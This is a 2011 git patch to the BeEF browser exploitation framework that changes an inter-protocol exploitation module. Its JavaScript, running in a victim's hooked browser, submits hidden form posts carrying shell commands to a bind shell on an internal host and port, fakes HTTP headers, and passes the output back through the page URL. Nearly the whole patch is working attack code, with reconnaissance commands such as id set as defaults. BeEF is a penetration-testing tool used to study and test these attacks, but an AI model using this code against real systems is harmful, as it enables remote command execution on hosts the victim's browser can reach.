From d0f0051878708784e757f8a70124918e9197efd4 Mon Sep 17 00:00:00 2001 From: "buherator@gmail.com" Date: Sun, 2 Oct 2011 12:39:16 +0000 Subject: [PATCH] Fixed IPEC POSIX module git-svn-id: https://beef.googlecode.com/svn/trunk@1340 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- .../inter_protocol_posix_bindshell/command.js | 23 ++++++++++++------- .../inter_protocol_posix_bindshell/module.rb | 3 ++- 2 files changed, 17 insertions(+), 9 deletions(-) diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js index 318ac6b0d..0babf4451 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/command.js +++ b/modules/ipec/inter_protocol_posix_bindshell/command.js @@ -20,6 +20,7 @@ beef.execute(function() { var cmd = '<%= @cmd %>'; var command_timeout = "<%= @command_timeout %>"; var internal_counter = 0; + var result_size = "<%= @result_size %>"; // create iframe var iframe = document.createElement("iframe"); @@ -28,7 +29,7 @@ beef.execute(function() { document.body.appendChild(iframe); // send a request - function send_cmds(ip, port, cmd) { + function send_cmds(ip, port, cmd, size) { var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&"; var parent = window.location.href; @@ -45,16 +46,22 @@ beef.execute(function() { myExt = document.createElement("INPUT"); myExt.setAttribute("id",<%= @command_id %>); myExt.setAttribute("name",<%= @command_id %>); - myExt.setAttribute("value","echo \"
\" & " + cmd + " & echo Directory Contents: & ls -la & "); + myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(34+cmd.length+52+parent.length+115+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \"
\";(" + cmd + ")|head -c "+size+" ; "); myform.appendChild(myExt); + // Adding puffer space for the command result + end_talkback=" echo -e \"__END_OF_POSIX_IPC<%= @command_id %>__
window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);"; + while(--size) end_talkback+=" "; + end_talkback+="\" \\\\r ; exit"; + + // post js to call home and close connection - myExt = document.createElement("INPUT"); - myExt.setAttribute("id","endTag"); - myExt.setAttribute("name","
"); - myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);\" & exit & exit & exit"); + myExt2 = document.createElement("INPUT"); + myExt2.setAttribute("id","endTag"); + myExt2.setAttribute("name",""); + myExt2.setAttribute("value",end_talkback); - myform.appendChild(myExt); + myform.appendChild(myExt2); myform.submit(); } @@ -88,7 +95,7 @@ beef.execute(function() { // send request and wait for reply } else { - send_cmds(target_ip, target_port, cmd); + send_cmds(target_ip, target_port, cmd,result_size); waituntilok(); } diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 55f458aad..6c6de8bc5 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -61,7 +61,8 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo HostName: & hostname & ifconfig & netstat -an', 'width'=>'200px' } + {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type'=>'textarea', 'value'=>'echo ID: ; id', 'width'=>'200px' }, + {'name'=>'result_size', 'ui_label'=>'Result Size', 'description'=>'Expected maximum size of the result in bytes','value'=>'1024'} ] end